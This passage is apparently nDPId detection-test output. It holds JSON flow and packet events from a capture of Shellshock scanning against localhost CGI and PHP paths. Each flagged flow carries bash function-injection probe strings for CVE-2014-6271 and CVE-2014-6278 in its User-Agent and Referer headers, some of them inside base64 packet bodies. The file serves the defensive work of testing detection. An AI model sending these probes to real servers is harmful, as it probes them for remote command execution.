{"hostname":"127.0.0.1","url":"127.0.0.1\/php4","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277433,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":1,"flow_last_seen":1576420277433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277433,"pkt":"AAAAAAAAAAAAAAAACABFAAEFSMVAAEAG8yt\/AAABfwAAAcVMH5DeS3AOoHbKrYAYAED++QAAAQEICp1m\/eGdZv3hR0VUIC9waHA1IEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277433,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php5","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277434,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":1,"flow_last_seen":1576420277434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277434,"pkt":"AAAAAAAAAAAAAAAACABFAAEI0WFAAEAGaox\/AAABfwAAAcVOH5BRy+mS7UbDZYAYAED+\/AAAAQEICp1m\/eKdZv3iR0VUIC9waHAtY2dpIEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} +01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277434,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277436,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":1,"flow_last_seen":1576420277436,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277436,"pkt":"AAAAAAAAAAAAAAAACABFAAEIqnVAAEAGkXh\/AAABfwAAAcVQH5Bll5K9uysWxoAYAED+\/AAAAQEICp1m\/eOdZv3jR0VUIC9waHAuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} +01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277436,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277437,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":1,"flow_last_seen":1576420277437,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277437,"pkt":"AAAAAAAAAAAAAAAACABFAAEJlAhAAEAGp+R\/AAABfwAAAcVSH5AUHqzKqBdRL4AYAED+\/QAAAQEICp1m\/eWdZv3lR0VUIC9waHAuZmNnaSBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277437,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.fcgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277438,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":1,"flow_last_seen":1576420277438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277438,"pkt":"AAAAAAAAAAAAAAAACABFAAEJhwhAAEAGtOR\/AAABfwAAAcVUH5Cc4b\/Kjk5kuIAYAED+\/QAAAQEICp1m\/eadZv3mR0VUIC9wcmludGVudiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277438,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/printenv","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7560000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277439,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":1,"flow_last_seen":1576420277439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277439,"pkt":"AAAAAAAAAAAAAAAACABFAAETyIlAAEAGc1l\/AAABfwAAAcVWH5DyzvBYc36tz4AYAED\/BwAAAQEICp1m\/eedZv3nR0VUIC9yZXN0b3JlX2NvbmZpZy5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} +01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7560000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277439,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/restore_config.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277442,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":1,"flow_last_seen":1576420277442,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277442,"pkt":"AAAAAAAAAAAAAAAACABFAAEICV1AAEAGMpF\/AAABfwAAAcVYH5Aa\/jGM\/2VZ0IAYAED+\/AAAAQEICp1m\/eqdZv3pR0VUIC9ydWJ5LnJiIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277442,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ruby.rb","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7560000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277443,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00762{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":1,"flow_last_seen":1576420277443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"thread_ts_msec":1576420277443,"pkt":"AAAAAAAAAAAAAAAACABFAAEH1YJAAEAGZmx\/AAABfwAAAcVaH5CqXO1RjdaXCYAYAED++wAAAQEICp1m\/eudZv3rR0VUIC9zZWFyY2ggSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} +01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7560000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277443,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277444,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":1,"flow_last_seen":1576420277444,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277444,"pkt":"AAAAAAAAAAAAAAAACABFAAELsxNAAEAGiNd\/AAABfwAAAcVcH5B0n4vBZle5N4AYAED+\/wAAAQEICp1m\/eydZv3sR0VUIC9zZWFyY2guY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277444,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277446,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":1,"flow_last_seen":1576420277446,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277446,"pkt":"AAAAAAAAAAAAAAAACABFAAELQstAAEAG+R9\/AAABfwAAAcVeH5AckXoZTNNhQ4AYAED+\/wAAAQEICp1m\/e6dZv3uR0VUIC9zZXJ2ZXIucGhwIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KDQo="} +01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277446,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 